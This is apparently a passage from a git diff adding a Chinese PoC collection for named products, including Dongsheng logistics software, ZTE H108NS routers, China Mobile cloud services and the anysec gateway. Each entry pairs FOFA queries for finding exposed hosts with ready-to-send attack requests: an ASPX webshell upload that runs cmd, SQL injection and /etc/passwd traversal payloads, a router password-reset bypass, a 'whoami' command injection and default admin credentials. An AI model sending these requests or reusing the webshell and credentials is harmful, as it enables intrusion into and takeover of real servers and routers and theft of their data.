+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0)Firefox/129.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Connection: close
+```
+
+![image-20241106172104100](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061721169.png)
diff --git a/东胜物流软件CertUpload文件上传漏洞.md b/东胜物流软件CertUpload文件上传漏洞.md
new file mode 100644
index 0000000..c01818d
--- /dev/null
+++ b/东胜物流软件CertUpload文件上传漏洞.md
@@ -0,0 +1,35 @@
+# 东胜物流软件CertUpload文件上传漏洞
+
+东胜物流软件是青岛东胜伟业软件有限公司一款集订单管理、仓库管理、运输管理等多种功能于一体的物流管理软件。由于东胜物流软件  CertUpload 接口处未对用户上传的文件进行合理的判断和过滤，导致存在文件上传漏洞，未经身份验证远程攻击者可利用该漏洞上传任意脚本文件，执行恶意代码，写入WebShell,进一步控制服务器权限。
+
+## fofa
+
+```javascript
+body="FeeCodes/CompanysAdapter.aspx" || body="dhtmlxcombo_whp.js" || body="dongshengsoft" || body="theme/dhtmlxcombo.css"
+```
+
+## poc
+
+```javascript
+POST /MsWlTruck/CertUpload HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTqkdY1lCvbvpmown
+
+------WebKitFormBoundaryaKljzbg49Mq4ggLz
+Content-Disposition: form-data; name="file"; filename="rce.aspx"
+Content-Type: image/jpeg
+
+<%@ Page Language="Jscript" validateRequest="false" %><%var c=new System.Diagnostics.ProcessStartInfo("cmd");var e=new System.Diagnostics.Process();var out:System.IO.StreamReader,EI:System.IO.StreamReader;c.UseShellExecute=false;c.RedirectStandardOutput=true;c.RedirectStandardError=true;e.StartInfo=c;c.Arguments="/c " + Request.Item["cmd"];e.Start();out=e.StandardOutput;EI=e.StandardError;e.Close();Response.Write(out.ReadToEnd() + EI.ReadToEnd());System.IO.File.Delete(Request.PhysicalPath);Response.End();%>
+------WebKitFormBoundaryaKljzbg49Mq4ggLz
+Content-Disposition: form-data; name="TruckNo";
+
+1
+------WebKitFormBoundaryaKljzbg49Mq4ggLz
+Content-Disposition: form-data; name="Cert_Type";
+
+1
+------WebKitFormBoundaryaKljzbg49Mq4ggLz--
+```
+
+![image-20241122152041797](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411221520864.png)
\ No newline at end of file
diff --git a/东胜物流软件GetDataListCA存在SQL注入漏洞.md b/东胜物流软件GetDataListCA存在SQL注入漏洞.md
new file mode 100644
index 0000000..9318a2e
--- /dev/null
+++ b/东胜物流软件GetDataListCA存在SQL注入漏洞.md
@@ -0,0 +1,23 @@
+## 东胜物流软件GetDataListCA存在SQL注入漏洞
+
+东胜物流软件GetDataListCA存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息。
+
+## fofa
+
+```javascript
+body="FeeCodes/CompanysAdapter.aspx" || body="dhtmlxcombo_whp.js" || body="dongshengsoft" || body="theme/dhtmlxcombo.css"
+```
+
+## poc
+
+```javascript
+GET /MvcShipping/MsCwGenlegAccitems/GetDataListCA?PACCGID=1%27%29+AND+6782+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%28113%29%2BCHAR%28120%29%2BCHAR%28118%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%286782%3D6782%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%2898%29%2BCHAR%28106%29%2BCHAR%28106%29%2BCHAR%28113%29%29%29--+OevW HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Connection: close
+```
+
+![image-20241114140448209](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411141404276.png)
diff --git a/东胜物流软件GetDataList存在SQL注入漏洞.md b/东胜物流软件GetDataList存在SQL注入漏洞.md
new file mode 100644
index 0000000..8f7e360
--- /dev/null
+++ b/东胜物流软件GetDataList存在SQL注入漏洞.md
@@ -0,0 +1,33 @@
+# 东胜物流软件GetDataList存在SQL注入漏洞
+
+# 一、漏洞简介
+东胜物流软件是一款致力于为客户提供IT支撑的 SOP， 帮助客户大幅提高工作效率，降低各个环节潜在风险的物流软件。东胜物流软件 GetDataList接口处存在 SQL 注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。
+
+# 二、影响版本
++ 东胜物流软件
+
+# 三、资产测绘
++ fofa`fid="Z4c2hPCi5IR/AnH5vZXNSQ=="`
++ 特征
+
+![1708936256348-8d7bf6c6-a3aa-4202-9f9c-a325885eef04.png](./img/QafmrT00Cjqvxhgl/1708936256348-8d7bf6c6-a3aa-4202-9f9c-a325885eef04-278539.png)
+
+# 四、漏洞复现
+```plain
+GET /TruckMng/MsWlDriver/GetDataList?_dc=1665626804091&start=0&limit=30&sort&condition=123+IN+(CHAR(113)%2bCHAR(120)%2bCHAR(112)%2bCHAR(113)%2bCHAR(113)%2bCHAR(113)%2bCHAR(122)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113))--%20&page=1&page=1 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Connection: close
+Accept-Encoding: gzip
+```
+
+![1708944988680-1741de01-6614-4b5a-8913-8f29d37c10da.png](./img/QafmrT00Cjqvxhgl/1708944988680-1741de01-6614-4b5a-8913-8f29d37c10da-630979.png)
+
+```plain
+qxpqqqzkqq
+```
+
+
+
+> 更新: 2024-02-29 23:55:41  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/mp5bydo55w118fyr>
\ No newline at end of file
diff --git a/东胜物流软件SaveUserQuerySetting存在SQL注入漏洞.md b/东胜物流软件SaveUserQuerySetting存在SQL注入漏洞.md
new file mode 100644
index 0000000..849f60b
--- /dev/null
+++ b/东胜物流软件SaveUserQuerySetting存在SQL注入漏洞.md
@@ -0,0 +1,39 @@
+# 东胜物流软件SaveUserQuerySetting存在SQL注入漏洞
+
+# 一、漏洞简介
+东胜物流软件是一款致力于为客户提供IT支撑的 SOP， 帮助客户大幅提高工作效率，降低各个环节潜在风险的物流软件。东胜物流软件 SaveUserQuerySetting接口处存在 SQL 注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。
+
+# 二、影响版本
++ 东胜物流软件
+
+# 三、资产测绘
++ fofa`fid="Z4c2hPCi5IR/AnH5vZXNSQ=="`
++ 特征
+
+![1708936256348-8d7bf6c6-a3aa-4202-9f9c-a325885eef04.png](./img/Z-zu1u1tj1z1oq2D/1708936256348-8d7bf6c6-a3aa-4202-9f9c-a325885eef04-730451.png)
+
+# 四、漏洞复现
+```plain
+POST /MvcShipping/MsBaseInfo/SaveUserQuerySetting HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36
+Content-Length: 857
+Content-Type: application/x-www-form-urlencoded
+Accept-Encoding: gzip, deflate
+Connection: close
+
+formname=MsRptSaleBalProfitShareIndex'+AND+2523+IN+(SELECT+(CHAR(113)%2bCHAR(120)%2bCHAR(112)%2bCHAR(113)%2bCHAR(113)%2b(SELECT+SUBSTRING((ISNULL(CAST((+sys.fn_VarBinToHexStr(hashbytes('MD5','hello')))+AS+NVARCHAR(4000)),CHAR(32))),1,1024))%2bCHAR(113)%2bCHAR(122)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)))+AND+'uKco'%3d'uKco&isvisible=true&issavevalue=true&querydetail=%7B%22PS_MBLNO%22%3A%22%22%2C%22PS_VESSEL%22%3A%22%22%2C%22PS_VOYNO%22%3A%22%22%2C%22PS_SALE%22%3A%22%5Cu91d1%5Cu78ca%22%2C%22PS_OP%22%3Anull%2C%22PS_EXPDATEBGN%22%3A%222020-02-01%22%2C%22PS_EXPDATEEND%22%3A%222020-02-29%22%2C%22PS_STLDATEBGN%22%3A%22%22%2C%22PS_STLDATEEND%22%3A%22%22%2C%22PS_ACCDATEBGN%22%3A%22%22%2C%22PS_ACCDATEEND%22%3A%22%22%2C%22checkboxfield-1188-inputEl%22%3A%22on%22%2C%22PS_CUSTSERVICE%22%3Anull%2C%22PS_DOC%22%3Anull%2C%22hiddenfield-1206-inputEl%22%3A%22%22%7D}
+```
+
+![1708936597114-d9d3ffd6-39ff-46a5-8c1a-089a70b86853.png](./img/Z-zu1u1tj1z1oq2D/1708936597114-d9d3ffd6-39ff-46a5-8c1a-089a70b86853-946114.png)
+
+```plain
+qxpqq0x5d41402abc4b2a76b9719d911017c592qzkqq
+```
+
+![1708946240065-a4df07ad-6ae3-4004-97f5-d08bac4a7286.png](./img/Z-zu1u1tj1z1oq2D/1708946240065-a4df07ad-6ae3-4004-97f5-d08bac4a7286-976094.png)
+
+
+
+> 更新: 2024-02-29 23:55:41  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kmeubkhryrzmp90u>
\ No newline at end of file
diff --git a/东胜物流软件TCodeVoynoAdapter存在SQL注入漏洞.md b/东胜物流软件TCodeVoynoAdapter存在SQL注入漏洞.md
new file mode 100644
index 0000000..5389706
--- /dev/null
+++ b/东胜物流软件TCodeVoynoAdapter存在SQL注入漏洞.md
@@ -0,0 +1,45 @@
+# 东胜物流软件TCodeVoynoAdapter存在SQL注入漏洞
+
+# 一、漏洞简介
+东胜物流软件是一款致力于为客户提供IT支撑的 SOP， 帮助客户大幅提高工作效率，降低各个环节潜在风险的物流软件。东胜物流软件 TCodeVoynoAdapter接口处存在 SQL 注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。
+
+# 二、影响版本
++ 东胜物流软件
+
+# 三、资产测绘
++ fofa`fid="Z4c2hPCi5IR/AnH5vZXNSQ=="`
++ 特征
+
+![1708936256348-8d7bf6c6-a3aa-4202-9f9c-a325885eef04.png](./img/rJIO5oV0sZk0LMxK/1708936256348-8d7bf6c6-a3aa-4202-9f9c-a325885eef04-580498.png)
+
+# 四、漏洞复现
+```plain
+GET /FeeCodes/TCodeVoynoAdapter.aspx?mask=0&pos=0&strVESSEL=1'%20AND%202523%20IN%20(SELECT%20(CHAR(113)%2bCHAR(120)%2bCHAR(112)%2bCHAR(113)%2bCHAR(113)%2b(SELECT%20SUBSTRING((ISNULL(CAST((%20sys.fn_VarBinToHexStr(hashbytes('MD5','hello')))%20AS%20NVARCHAR(4000)),CHAR(32))),1,1024))%2bCHAR(113)%2bCHAR(122)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)))%20AND%20'uKco'%3d'uKco HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36
+Accept-Encoding: gzip, deflate
+Connection: close
+```
+
+![1708936295313-27c1ae9a-9893-4fe5-8287-1cbd0d00ebfa.png](./img/rJIO5oV0sZk0LMxK/1708936295313-27c1ae9a-9893-4fe5-8287-1cbd0d00ebfa-836040.png)
+
+```plain
+qxpqq0x5d41402abc4b2a76b9719d911017c592qzkqq
+```
+
+sqlmap
+
+```plain
+GET /FeeCodes/TCodeVoynoAdapter.aspx?mask=0&pos=0&strVESSEL=1 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36
+Accept-Encoding: gzip, deflate
+Connection: close
+```
+
+![1708936414718-79468349-55d8-47d5-95d9-14824ae2eb8d.png](./img/rJIO5oV0sZk0LMxK/1708936414718-79468349-55d8-47d5-95d9-14824ae2eb8d-485496.png)
+
+
+
+> 更新: 2024-02-29 23:55:41  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/mb0ycgqbf4y3x7lf>
\ No newline at end of file
diff --git a/中兴H108NS路由器存在任意密码修改漏洞.md b/中兴H108NS路由器存在任意密码修改漏洞.md
new file mode 100644
index 0000000..4ff7919
--- /dev/null
+++ b/中兴H108NS路由器存在任意密码修改漏洞.md
@@ -0,0 +1,46 @@
+# 中兴H108NS 路由器存在任意密码修改漏洞
+
+### 一、漏洞描述
+中兴H108NS路由器tools_admin.asp接口处存在身份认证绕过漏洞，攻击者可利用该漏洞绕过身份认证允许访问路由器的管理面板修改管理员密码，获取用户的敏感信息
+
+### 二、影响版本
+<font style="color:#000000;">中兴H108NS 路由器</font>
+
+### 三、资产测绘
+```plain
+product="ZTE-H108NS"
+```
+
+![1720893566422-1dca4fef-cd22-42ec-a6c6-f1f781981eb1.png](./img/yg6Rd5hWh54g21ga/1720893566422-1dca4fef-cd22-42ec-a6c6-f1f781981eb1-490795.png)
+
+### 四、漏洞复现
+获取cookie
+
+```java
+GET / HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Accept-Encoding: gzip
+```
+
+![1720893478802-fc32d4a7-4418-4bdc-b001-79fad466674c.png](./img/yg6Rd5hWh54g21ga/1720893478802-fc32d4a7-4418-4bdc-b001-79fad466674c-592313.png)
+
+使用获取cookie修改密码
+
+```java
+POST /cgi-bin/tools_admin.asp HTTP/1.1
+Host: 
+Content-Type: application/x-www-form-urlencoded
+Cookie: SESSIONID=39a2aef8;
+Accept-Encoding: gzip
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+ 
+adminFlag=1&CurrentAccess=0&uiViewTools_Password=123456&uiViewTools_PasswordConfirm=确认密码
+```
+
+min/123456登录系统![1720893410557-a4febc66-46a5-477d-8c28-0218ba4363e7.png](./img/yg6Rd5hWh54g21ga/1720893410557-a4febc66-46a5-477d-8c28-0218ba4363e7-749875.png)
+
+
+
+> 更新: 2024-08-12 17:48:53  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vil2xt2pbg119yg4>
\ No newline at end of file
diff --git a/中兴H108NS路由器存在弱口令漏洞.md b/中兴H108NS路由器存在弱口令漏洞.md
new file mode 100644
index 0000000..faf66e5
--- /dev/null
+++ b/中兴H108NS路由器存在弱口令漏洞.md
@@ -0,0 +1,26 @@
+# 中兴H108NS 路由器存在弱口令漏洞
+
+### 一、漏洞描述
+中兴H108NS 路由器存在弱口令漏洞
+
+### 二、影响版本
+<font style="color:#000000;">中兴H108NS 路由器</font>
+
+### 三、资产测绘
+```plain
+product="ZTE-H108NS"
+```
+
+![1720677624454-6b76b40a-5923-426e-9d81-63dd9d76617b.png](./img/1oyAPl1XUS9_H-Ib/1720677624454-6b76b40a-5923-426e-9d81-63dd9d76617b-006737.png)
+
+### 四、漏洞复现
+```plain
+admin/admin
+```
+
+![1720893594578-39dfeb43-19e8-4d63-bf9d-2e26120189e3.png](./img/1oyAPl1XUS9_H-Ib/1720893594578-39dfeb43-19e8-4d63-bf9d-2e26120189e3-508250.png)
+
+
+
+> 更新: 2024-08-12 17:48:53  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kwnbg3w5wxmx1crw>
\ No newline at end of file
diff --git a/中兴ZTE-ZSR-V2系列多业务路由器存在任意文件读取漏洞.md b/中兴ZTE-ZSR-V2系列多业务路由器存在任意文件读取漏洞.md
new file mode 100644
index 0000000..c060ffd
--- /dev/null
+++ b/中兴ZTE-ZSR-V2系列多业务路由器存在任意文件读取漏洞.md
@@ -0,0 +1,17 @@
+# 中兴ZTE-ZSR-V2系列多业务路由器存在任意文件读取漏洞
+
+中兴ZTE-ZSR-V2系列多业务路由器存在任意文件读取漏洞，任意文件下载漏洞可能导致敏感信息泄露、数据盗窃及其他安全风险，从而对系统和用户造成严重危害。
+
+## fofa
+
+```javascript
+title="ZSRV2路由器Web管理系统"
+```
+
+## poc
+
+```
+GET /css//../../../../../../../../etc/passwd HTTP/1.1
+Host: {{Hostname}}
+```
+
diff --git a/中国移动云控制台preview存在任意文件读取.md b/中国移动云控制台preview存在任意文件读取.md
new file mode 100644
index 0000000..a9ae1e5
--- /dev/null
+++ b/中国移动云控制台preview存在任意文件读取.md
@@ -0,0 +1,27 @@
+# 中国移动云控制台preview存在任意文件读取
+
+# 一、漏洞简介
+中国移动云控制台是一套用于统一查看和管理移动云产品及服务的系统，移动云控制台存在文件任意下载漏洞，攻击者可利用此漏洞获取任意文件信息。
+
+# 二、影响版本
++ 中国移动云控制台
+
+# 三、资产测绘
++ fofa`body="op-login-static/favicon.ico" || header="/oauth2/code/opgateway"`
++ 特征
+
+![1717665626881-f95bf7e9-e0e5-418a-bccf-45b67fa9ea2f.png](./img/dwA7UL8Kn96zuHeq/1717665626881-f95bf7e9-e0e5-418a-bccf-45b67fa9ea2f-740575.png)
+
+# 四、漏洞复现
+```java
+GET /api/query/helpcenter/api/v2/preview?fileName=../../../../../../../../etc/passwd HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+```
+
+![1717665679298-f02a0afd-8a0e-4cde-b779-7cb99b10ce9c.png](./img/dwA7UL8Kn96zuHeq/1717665679298-f02a0afd-8a0e-4cde-b779-7cb99b10ce9c-230957.png)
+
+
+
+> 更新: 2024-06-11 10:30:33  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/sh18y2kvdy1ou9gn>
\ No newline at end of file
diff --git a/中国移动禹路由ExportSettings.sh存在信息泄露漏洞.md b/中国移动禹路由ExportSettings.sh存在信息泄露漏洞.md
new file mode 100644
index 0000000..24fe215
--- /dev/null
+++ b/中国移动禹路由ExportSettings.sh存在信息泄露漏洞.md
@@ -0,0 +1,64 @@
+# 中国移动禹路由ExportSettings.sh存在信息泄露漏洞
+
+## 一、漏洞简介
+ 中移禹路由器是一款性能强大且功能丰富的无线路由器。它采用了最新的Wi-Fi 6技术，提供更快的速度和更稳定的连接。它支持双频段同时工作，2.4GHz和5GHz频段可同时提供高速的无线网络，满足多设备同时连接的需求。中移禹路由器还具备MU-MIMO技术，可以同时处理多个设备的数据传输，提供更快的速度和更稳定的连接。中移铁通禹路由器ExportSettings接口处存在信息泄露漏洞，恶意攻击者可能会利用此漏洞获取到登陆账户和密码，从而登录后台，使服务器处于不安全的状态。  
+
+## 二、资产测绘
+```plain
+fofa：title="互联世界 物联未来-登录"
+hunter：web.body="互联世界 物联未来-登录"
+```
+
+![1715321824315-4c4c83b0-d438-4f26-8f8b-e5f94fb2a3a6.png](./img/SVqYtlA8uAuRUiVF/1715321824315-4c4c83b0-d438-4f26-8f8b-e5f94fb2a3a6-827283.png)
+
+![1715321983112-15fbb15d-d528-42e9-ae4e-5aad9949c6ae.png](./img/SVqYtlA8uAuRUiVF/1715321983112-15fbb15d-d528-42e9-ae4e-5aad9949c6ae-628253.png)
+
+## 三、漏洞复现
+```http
+GET /cgi-bin/ExportSettings.sh HTTP/1.1
+Host:127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Content-Length: 0
+
+```
+
+![1715322118808-18bfdc8e-7d0a-4a72-8285-1e03722d0c15.png](./img/SVqYtlA8uAuRUiVF/1715322118808-18bfdc8e-7d0a-4a72-8285-1e03722d0c15-396284.png)
+
+![1715322129700-996c3d40-cd72-4e91-86e7-f7bc9ee0262b.png](./img/SVqYtlA8uAuRUiVF/1715322129700-996c3d40-cd72-4e91-86e7-f7bc9ee0262b-534381.png)
+
+## 四、Nuclei
+```http
+id: ZYTT-ExportSettings-Info
+
+info:
+  name: 中移铁通禹路由器-信息泄露-ExportSettings
+  author: haoguoguo
+  severity: high
+  metadata: 
+    fofa-query: title="互联世界 物联未来-登录"
+variables:
+  filename: "{{to_lower(rand_base(5))}}"
+  boundary: "{{to_lower(rand_base(20))}}"
+http:
+  - raw:
+      - |
+        GET /cgi-bin/ExportSettings.sh HTTP/1.1
+        Host:{{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+        Content-Length: 0
+
+
+    matchers:
+      - type: dsl
+        dsl:
+          - status_code==200 && contains_all(body,"wan_ipaddr","HostName")
+```
+
+![1715322153837-15d20d64-a9ee-4f24-84af-cc2a5bdb87aa.png](./img/SVqYtlA8uAuRUiVF/1715322153837-15d20d64-a9ee-4f24-84af-cc2a5bdb87aa-356001.png)
+
+
+
+
+
+> 更新: 2024-06-11 10:30:33  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qmarera6wxzybbby>
\ No newline at end of file
diff --git a/中成科信票务管理系统ReturnTicketPlance.ashx存在SQL注入.md b/中成科信票务管理系统ReturnTicketPlance.ashx存在SQL注入.md
new file mode 100644
index 0000000..05ce2b9
--- /dev/null
+++ b/中成科信票务管理系统ReturnTicketPlance.ashx存在SQL注入.md
@@ -0,0 +1,25 @@
+# 中成科信票务管理系统ReturnTicketPlance.ashx存在SQL注入
+
+中成科信票务管理系统 ReturnTicketPlance.ashx 接口处存在SQL注入漏洞，未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息，攻击者甚至可以在高权限下向服务器写入命令，进一步获取服务器系统权限。
+
+## fofa
+
+```yaml
+icon_hash="1632964065" || icon_hash="-2142050529"
+```
+
+## poc
+
+```javascript
+POST /SystemManager/TicketSystem/ReturnTicketPlance.ashx HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
+Accept: */*
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Content-Type: application/x-www-form-urlencoded; charset=utf-8
+Connection: close
+
+Method=GetCheckInDetail&ticketNo='%20UNION%20ALL%20SELECT%20NULL,CHAR(113)+CHAR(106)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(74)+CHAR(79)+CHAR(112)+CHAR(87)+CHAR(122)+CHAR(103)+CHAR(66)+CHAR(87)+CHAR(118)+CHAR(107)+CHAR(77)+CHAR(103)+CHAR(121)+CHAR(119)+CHAR(87)+CHAR(69)+CHAR(102)+CHAR(68)+CHAR(112)+CHAR(105)+CHAR(97)+CHAR(75)+CHAR(105)+CHAR(77)+CHAR(106)+CHAR(66)+CHAR(73)+CHAR(102)+CHAR(122)+CHAR(78)+CHAR(80)+CHAR(81)+CHAR(83)+CHAR(66)+CHAR(71)+CHAR(102)+CHAR(73)+CHAR(74)+CHAR(80)+CHAR(65)+CHAR(113)+CHAR(106)+CHAR(122)+CHAR(122)+CHAR(113),NULL,NULL--%20BEsy
+```
+
diff --git a/中成科信票务管理系统UploadHandler.ashx任意文件上传漏洞.md b/中成科信票务管理系统UploadHandler.ashx任意文件上传漏洞.md
new file mode 100644
index 0000000..6ee1bed
--- /dev/null
+++ b/中成科信票务管理系统UploadHandler.ashx任意文件上传漏洞.md
@@ -0,0 +1,32 @@
+# 中成科信票务管理系统UploadHandler.ashx任意文件上传漏洞
+
+中成科信票务管理系统 UploadHandler.ashx 任意文件上传漏洞，未经身份攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
+
+## fofa
+
+```javascript
+icon_hash="1632964065" || icon_hash="-2142050529"
+```
+
+## poc
+
+```javascript
+POST /WeChat/ashx/UploadHandler.ashx HTTP/2
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7yyQ5XLHOn6WZ6MT
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+ 
+------WebKitFormBoundary7yyQ5XLHOn6WZ6MT
+Content-Disposition: form-data; name="file"; filename="1.asp"
+Content-Type: image/jpeg
+ 
+<% Response.Write("Hello, World!") %>
+------WebKitFormBoundary7yyQ5XLHOn6WZ6MT--
+```
+
+![image-20241115101054420](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411151010495.png)
+
+文件路径：`/UploadImage/1.asp`
\ No newline at end of file
diff --git a/中新天达系统存在任意文件读取漏洞.md b/中新天达系统存在任意文件读取漏洞.md
new file mode 100644
index 0000000..c9eec65
--- /dev/null
+++ b/中新天达系统存在任意文件读取漏洞.md
@@ -0,0 +1,17 @@
+# 中新天达系统存在任意文件读取漏洞
+
+中新天达系统`/aexp/ProxyDownload`存在任意文件读取漏洞，可能导致敏感信息泄露、数据盗窃及其他安全风险，从而对系统和用户造成严重危害。
+
+## fofa
+
+```haskell
+body="aexp/ValidateImage"
+```
+
+## poc
+
+```javascript
+/aexp/ProxyDownload?path=/speedec/webapps/webftp/../../../../etc/passwd
+```
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409272013561.webp)
\ No newline at end of file
diff --git a/中新金盾信息安全管理系统存在默认管理员密码漏洞.md b/中新金盾信息安全管理系统存在默认管理员密码漏洞.md
new file mode 100644
index 0000000..a4ffc1f
--- /dev/null
+++ b/中新金盾信息安全管理系统存在默认管理员密码漏洞.md
@@ -0,0 +1,26 @@
+# 中新金盾信息安全管理系统存在默认管理员密码漏洞
+
+# 一、漏洞简介
+中新金盾信息安全管理系统存在默认管理员密码漏洞
+
+# 二、影响版本
++ 中新金盾信息安全管理系统
+
+# 三、资产测绘
+```plain
+title="中新金盾信息安全管理系统"
+```
+
+![1717346225989-07bee9d9-2720-490c-9e8f-7a7c5b62b2fe.png](./img/Zh8oI4mLPdfVr30y/1717346225989-07bee9d9-2720-490c-9e8f-7a7c5b62b2fe-477213.png)
+
+# 四、漏洞复现
+```plain
+admin/zxsoft1234!@#$
+```
+
+![1717346140443-e800159a-5b34-4b6f-9c73-74167025ef2b.png](./img/Zh8oI4mLPdfVr30y/1717346140443-e800159a-5b34-4b6f-9c73-74167025ef2b-843162.png)
+
+
+
+> 更新: 2024-06-11 10:30:33  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/aiqgb5g0s3ibbmf4>
\ No newline at end of file
diff --git a/中科网威anysec安全网关arping存在后台远程命令执行漏洞.md b/中科网威anysec安全网关arping存在后台远程命令执行漏洞.md
new file mode 100644
index 0000000..56589b8
--- /dev/null
+++ b/中科网威anysec安全网关arping存在后台远程命令执行漏洞.md
@@ -0,0 +1,38 @@
+# 中科网威anysec安全网关arping存在后台远程命令执行漏洞
+深圳市中科网威科技有限公司是一家专注于网络安全产品研发和生产的高新技术企业。‌中科网威anysec安全网关存在arping后台远程命令执行漏洞，攻击者可利用该漏洞获取网关权限。
+
+## fofa
+
+```javascript
+app="中科网威-anysec"
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/1622799/1733735125819-6e44adad-f0c0-4cdc-bab4-d2def9afe4e6.png)
+
+## poc
+1. 使用弱口令`admin/anysec`登录系统
+2. 执行命令
+
+```java
+POST /cgi-bin/system/arping.cgi HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br, zstd
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 80
+Connection: keep-alive
+Cookie: CGISID=2ZuEDPfh3Yxu6hyiAmyZpxIHymc9vSfxGJbcqhtl8RP51; sdmenu_my_menu=100000000
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: frame
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+Priority: u=4
+
+moduleid=150&tasknum=1&ip=127.0.0.1;whoami&interface=wan0&count=4&sip=8.8.8.8&x=58&y=16
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1734016663310-d6fe8c5a-89a6-47b8-b6d2-91427144aeff.png)
+
diff --git a/中科网威下一代防火墙控制系统download存在任意文件读取漏洞.md b/中科网威下一代防火墙控制系统download存在任意文件读取漏洞.md
new file mode 100644
index 0000000..2150597
--- /dev/null
+++ b/中科网威下一代防火墙控制系统download存在任意文件读取漏洞.md
@@ -0,0 +1,31 @@
+# 中科网威下一代防火墙控制系统download存在任意文件读取漏洞
+
+# 一、漏洞简介
